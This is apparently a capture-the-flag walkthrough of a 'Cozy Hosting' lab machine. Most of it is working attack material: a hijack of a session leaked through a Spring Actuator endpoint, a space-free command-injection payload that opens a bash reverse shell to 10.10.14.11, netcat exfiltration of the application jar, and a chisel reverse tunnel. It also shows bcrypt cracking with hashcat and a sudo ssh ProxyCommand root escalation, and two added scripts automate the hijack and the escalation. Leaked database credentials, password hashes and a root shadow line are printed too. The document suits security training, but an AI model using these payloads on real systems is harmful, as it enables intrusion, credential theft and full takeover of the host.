Nmap

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_ 256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Directory and file enumeration


The Spring Boot Actuator endpoint /actuator/sessions is reachable without logging in and lists the active HTTP sessions together with the user each one belongs to:

466A6E102F39705E188641FCA0D63E03    kanderson
A7ACC66BB7189D353EA6B026A42FC646    UNAUTHORIZED

Replacing our own session cookie value with kanderson's session ID hijacks that session and lands us in the admin area without knowing any password. The ID is only good for as long as kanderson's session is alive, so grab it and use it straight away.
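The session-hijack step scripted, as an added example that is not part of the original notes. It assumes the endpoint answers with a JSON object mapping session ID to principal (the SAMPLE_SESSIONS string below is constructed from the two entries above), that the target is http://cozyhosting.htb, and that the session cookie is Spring Boot's default JSESSIONID; TARGET, session_for_user, live_sessions and hijack are names chosen here.

```shell
#!/bin/sh
# Added example (not from the original notes): pull a privileged session ID out of
# /actuator/sessions and reuse it. Assumptions: the endpoint returns
# {"<sessionId>":"<user>", ...}, the host is cozyhosting.htb and the session cookie
# is Spring Boot's default JSESSIONID.

TARGET="${TARGET:-http://cozyhosting.htb}"

# Constructed sample of the endpoint's answer (IDs and users taken from the writeup).
SAMPLE_SESSIONS='{"466A6E102F39705E188641FCA0D63E03":"kanderson","A7ACC66BB7189D353EA6B026A42FC646":"UNAUTHORIZED"}'

# session_for_user JSON USER -> prints the session ID that belongs to USER, or nothing
session_for_user() {
    printf '%s\n' "$1" |
        tr ',' '\n' |
        sed -n "s/.*\"\([0-9A-Fa-f]*\)\":\"$2\".*/\1/p" |
        head -n 1
}

# live_sessions -> fetch the real endpoint (unauthenticated; needs network access)
live_sessions() {
    curl -s "$TARGET/actuator/sessions"
}

# hijack USER [PATH] -> request PATH (default: admin) carrying USER's session cookie
# and print the HTTP status; 200 instead of a redirect to the login page means the
# session was accepted.
hijack() {
    sid=$(session_for_user "$(live_sessions)" "$1") || return 1
    [ -n "$sid" ] || { echo "no live session for $1" >&2; return 1; }
    curl -s -o /dev/null -w '%{http_code}\n' \
        -b "JSESSIONID=$sid" "$TARGET/${2:-admin}"
}

# Stand-alone demo against the constructed sample
if [ "${1:-}" = "demo" ]; then
    printf 'kanderson session: %s\n' "$(session_for_user "$SAMPLE_SESSIONS" kanderson)"
fi
```

Run `hijack kanderson` against the live box; the extraction is deliberately a plain sed so it works from a shell with no jq.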


The username parameter is vulnerable to command injection, but the input is filtered for whitespace. The payload below gets a reverse shell without a single space: bash brace expansion turns {echo,<b64>} into echo <b64> and {base64,-d} into base64 -d, and the decoded one-liner is piped into bash. ${IFS} works as an alternative separator where brace expansion is not available.

root;`{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMS8xMzM3IDA+JjEK}|{base64,-d}|bash`

The base64 decodes to bash -i >& /dev/tcp/10.10.14.11/1337 0>&1, so start a listener on 1337 before sending it.

This gives us a shell as the user app.

After some enumeration it looks very likely that we are inside a Docker container.

app@cozyhosting:/app$ ls -la
total 58856
drwxr-xr-x  2 root root     4096 Aug 14 14:11 .
drwxr-xr-x 19 root root     4096 Aug 14 14:11 ..
-rw-r--r--  1 root root 60259688 Aug 11 00:45 cloudhosting-0.0.1.jar

The container has no python and we cannot write to /var/www, but nc is installed, so the jar is pulled back with netcat. Mind the direction: the side that listens writes the file, the side that connects sends it.

Receiving end (attacker box, listens and writes the file):

nc -l -p 1234 > out.file

Sending end (victim, connects to the attacker and streams the file; -w 3 closes the connection after 3 seconds of inactivity):

nc -w 3 [destination] 1234 < out.file

Compare a checksum (md5sum or sha256sum) on both ends before unpacking: a truncated transfer silently yields a corrupt jar.

Unpacking the jar (it is a plain zip) and reviewing the bundled Spring application.properties reveals the PostgreSQL credentials:

spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

Check whether PostgreSQL (5432) is actually listening on the box:

app@cozyhosting:/home$ ss -lutn
Netid State  Recv-Q Send-Q        Local Address:Port  Peer Address:Port Process
udp   UNCONN 0      0             127.0.0.53%lo:53         0.0.0.0:*
udp   UNCONN 0      0                   0.0.0.0:68         0.0.0.0:*
tcp   LISTEN 0      244               127.0.0.1:5432       0.0.0.0:*
tcp   LISTEN 0      511                 0.0.0.0:80         0.0.0.0:*
tcp   LISTEN 0      4096          127.0.0.53%lo:53         0.0.0.0:*
tcp   LISTEN 0      128                 0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      100     [::ffff:127.0.0.1]:8080             *:*
tcp   LISTEN 0      128                    [::]:22            [::]:*

PostgreSQL is bound to 127.0.0.1 only (the Spring app on 8080 is loopback-only as well), so it cannot be reached from the attacker box directly: a reverse port forward is needed.

Attacker: chisel server in reverse mode, listening on port 51234

./chisel server --reverse --port 51234

Victim: after uploading the chisel binary, the client connects back to the attacker on 51234 and asks the server to open port 5432 on the attacker side and tunnel it to 127.0.0.1:5432 on the victim (R:<attacker port>:<victim host>:<victim port>)

./chisel client 10.10.14.11:51234 R:5432:127.0.0.1:5432

Psql

From the attacker box, connect through the forwarded port with the credentials from the jar (psql prompts for the password):

psql -h 127.0.0.1 -p 5432 -U postgres

In the cozyhosting database the users table holds bcrypt hashes:

cozyhosting=# select * from users;
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin

Crack the bcrypt hashes with hashcat (mode 3200). The hash file holds one name:hash per line, hence --username; bcrypt at cost 10 is slow, so rockyou is about as large a wordlist as is practical here.

hashcat.exe -m 3200 -a 0 .\hash\cozyhosting.txt rockyou.txt --username

The admin hash cracks to manchesterunited; --show prints the recovered pair:

D:\hashcat-6.2.6>hashcat.exe -m 3200 -a 0 .\hash\cozyhosting.txt rockyou.txt --username --show
admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited

Login as josh

The password is reused: trying it against the local accounts seen earlier on the box, it works for josh over SSH (josh:manchesterunited).

Root

Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
(root) /usr/bin/ssh *

GTFOBins has an entry for sudo ssh: ssh hands its ProxyCommand to sh, and because sudo runs ssh as root that shell is root as well. Running the GTFOBins one-liner gives a root shell straight away.
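The root step with the check a practitioner wants in front of it, as an added example that is not part of the original notes: a sh script that picks the root-runnable commands out of sudo -l output (the SUDO_L text is constructed from the output above) and, only when /usr/bin/ssh is among them, runs the GTFOBins sudo ssh one-liner. It goes slightly beyond the page in also handling the (root) NOPASSWD: form of the sudoers line; root_bins, gtfobins_ssh_cmd and escalate are names chosen here.

```shell
#!/bin/sh
# Added example (not from the original notes): parse `sudo -l` for commands runnable
# as root and, if /usr/bin/ssh is one of them, use the GTFOBins ssh technique.
# SUDO_L is constructed from the sudo -l output in the writeup.

SUDO_L='Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *'

# root_bins SUDO_OUTPUT -> one path per line of commands runnable as root,
# accepting both "(root) /path" and "(root) NOPASSWD: /path" lines
root_bins() {
    printf '%s\n' "$1" |
        sed -n 's/^[[:space:]]*(root)[[:space:]]*//p' |
        sed 's/^NOPASSWD:[[:space:]]*//' |
        awk '{print $1}'
}

# gtfobins_ssh_cmd -> the GTFOBins "sudo ssh" one-liner. ssh runs ProxyCommand via
# sh -c; under sudo that sh is root, and 0<&2 1>&2 ties it to our terminal.
# "x" is a dummy host name: ssh never gets as far as connecting to it.
gtfobins_ssh_cmd() {
    printf '%s\n' "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x"
}

# escalate SUDO_OUTPUT -> run the technique only if ssh really is sudo-able as root
escalate() {
    root_bins "$1" | grep -qx '/usr/bin/ssh' ||
        { echo "ssh is not sudo-able as root, look for another GTFOBins entry" >&2; return 1; }
    eval "$(gtfobins_ssh_cmd)"
}

# Stand-alone demo: on the box, run `escalate "$(sudo -l)"`
if [ "${1:-}" = "demo" ]; then
    printf 'root-runnable: %s\n' "$(root_bins "$SUDO_L")"
    printf 'technique:     %s\n' "$(gtfobins_ssh_cmd)"
fi
```

Feed it the live output with `escalate "$(sudo -l)"`; the parse step is what you reuse on the next box, since whatever path root_bins prints is the one to look up on GTFOBins.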


root:$y$j9T$nK3A0N4wTEzopZkv8GQds0$NlR46AiiQOChoO1UNpiOYFIBHM7s956G8l8p/w15Sp2:19577:0:99999:7:::

root